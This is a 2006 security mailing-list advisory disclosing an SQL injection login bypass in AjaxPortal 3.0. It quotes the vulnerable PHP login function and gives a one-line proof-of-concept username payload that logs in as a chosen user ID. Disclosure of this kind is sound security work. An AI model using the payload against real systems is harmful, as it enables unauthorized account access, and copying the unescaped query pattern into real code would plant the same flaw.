[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060708121752.72163.qmail@web51001.mail.yahoo.com>
Date: Sat, 8 Jul 2006 05:17:52 -0700 (PDT)
From: alireza hassani <trueend5@...oo.com>
To: bugtraq@...urityfocus.com
Subject: [KAPDA::#46] - AjaxPortal Authentication Bypass
KAPDA New advisory
Vendor: http://myiosoft.com
Vulnerable: AjaxPortal v. 3.0
Bug: Sql Injection (Authentication Bypass)
Exploitation: Remote with browser
Description:
--------------------
AjaxPortal is based on Sajax technology - an open
source tool to make programming websites using the
Ajax framework known as XMLHTTPRequest or remote
scripting as easy as possible.customizable full
featured content management tool written in PHP, using
javascript and Mysql.
Vulnerability:
--------------------
Input Validation error in loginADP Function that
result in Login bypass when Magic quotes is disabled.
Code Snippets:
/ajaxp.php Lines: #568-593
function loginADP($username,$password,$remember){
$badlogin = 0;
if(isLoggedIn()){ return "Sucsess!"; }
$query = "SELECT * FROM ".PREFIX."ajaxp_users
WHERE username='$username' AND
password=PASSWORD('$password') AND active=1 LIMIT
1";
$result = mysql_query($query);
if(mysql_num_rows($result) > 0){
$userinfo = mysql_fetch_array($result);
$_SESSION['sess_username'] =
$userinfo['username'];
$_SESSION['sess_firstname'] =
$userinfo['firstname'];
$_SESSION['sess_lastname'] =
$userinfo['lastname'];
$_SESSION['sess_userid'] =
$userinfo['user_id'];
$_SESSION['sess_accesslevel'] =
$userinfo['accesslevel'];
$_SESSION['sess_usermd5'] = $userinfo['md5'];
$_SESSION['sess_theme_id'] =
$userinfo['theme_id'];
$_SESSION['sess_last_ip'] =
$_SERVER['REMOTE_ADDR'];
$_SESSION['sess_logged_in'] = 1;
$query = "UPDATE ".PREFIX."ajaxp_users SET
last_login=NOW(),
last_ip=\"".$_SERVER['REMOTE_ADDR']."\" WHERE
user_id=".$userinfo['user_id']."";
mysql_query($query);
if($remember==1)
{$_SESSION['remember']=$userinfo['user_id'];} else {
unset($_SESSION['remember']); }
$badlogin = 0;
return "Sucsess!";
} else {
$badlogin = 1;
}
POC:
--------------------
Username:a' or user_id=22/*
Password:abcdef
Solution:
--------------------
No Response from vendor.
Original Advisories:
--------------------
http://www.kapda.ir/advisory-355.html
Credit :
--------------------
Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran
[http://www.KAPDA.ir]
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
Powered by blists - more mailing lists